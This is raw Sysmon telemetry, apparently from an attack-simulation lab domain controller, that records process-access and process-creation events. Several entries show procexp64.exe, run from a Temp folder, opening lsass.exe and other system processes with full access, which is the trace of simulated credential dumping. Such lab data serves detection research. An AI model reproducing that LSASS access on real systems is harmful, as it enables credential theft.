15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789909Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789908Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789907Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789906Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789905Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789904Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789903Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.267{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789902Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.189{732C744F-3255-6010-D4A2-00000000A301}40245360C:\Windows\system32\svchost.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789901Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.126{732C744F-1518-600B-0A00-00000000A301}8481708C:\Windows\system32\services.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789900Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.126{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789899Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.126{732C744F-1517-600B-0500-00000000A301}640656C:\Windows\system32\csrss.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789898Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.126{732C744F-1518-600B-0A00-00000000A301}8484108C:\Windows\system32\services.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+307d|C:\Windows\system32\services.exe+6334|C:\Windows\system32\services.exe+dc24|C:\Windows\system32\services.exe+d248|C:\Windows\system32\services.exe+4d0c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789897Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.111{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789896Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.111{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789895Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.111{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789894Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.111{732C744F-1518-600B-0B00-00000000A301}8566876C:\Windows\system32\lsass.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789893Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789892Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789891Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789890Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789889Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-17DF-600B-9401-00000000A301}50844708C:\Windows\system32\csrss.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000789888Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-3255-6010-D1A2-00000000A301}17002492C:\Windows\System32\cmd.exe{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\system32\calc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\cmd.exe+f1e1|C:\Windows\System32\cmd.exe+11a37|C:\Windows\System32\cmd.exe+cb0d|C:\Windows\System32\cmd.exe+c295|C:\Windows\System32\cmd.exe+f916|C:\Windows\System32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000789887Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.093{732C744F-3255-6010-D3A2-00000000A301}6092C:\Windows\System32\calc.exe10.0.14393.4169 (rs1_release.210107-1130)Windows CalculatorMicrosoft® Windows® Operating SystemMicrosoft CorporationCALC.EXEcalc.exeC:\Users\Administrator\AppData\Local\Temp\2\ATTACKRANGE\Administrator{732C744F-17E1-600B-DAA7-130000000000}0x13a7da2HighMD5=2A5CC198FEFC04C2B6B95207A91D3668,SHA256=04FA16D1FBB5F047E7BF9756E8DDC1365AFEAAB22DD4A2C3F03E067B75BED8EA,IMPHASH=3843C3D4A5A7D1045ABE9A4BFCFAAB28{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c calc.exe 10341000x8000000000000000789886Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789885Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b13ce|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789884Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-2806-600F-D682-00000000A301}66245660C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b0294|C:\Windows\System32\SHELL32.dll+b1397|C:\Windows\explorer.exe+3c618|C:\Windows\explorer.exe+3c4a4|C:\Windows\explorer.exe+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789883Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789882Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.079{732C744F-17E2-600B-A601-00000000A301}55845760C:\Windows\system32\taskhostw.exe{732C744F-3255-6010-D2A2-00000000A301}4980C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\MSCTF.dll+f681|C:\Windows\System32\MSCTF.dll+fbf9|C:\Windows\System32\MSCTF.dll+105e3|C:\Windows\System32\MSCTF.dll+3d732|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789881Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:37.064{732C744F-2806-600F-D682-00000000A301}66244904C:\Windows\explorer.exe{732C744F-3255-6010-D1A2-00000000A301}1700C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b090f|C:\Windows\System32\SHELL32.dll+b14b5|C:\Windows\explorer.exe+1e03a|C:\Windows\explorer.exe+1e249|C:\Windows\explorer.exe+1df79|C:\Windows\explorer.exe+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789880Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 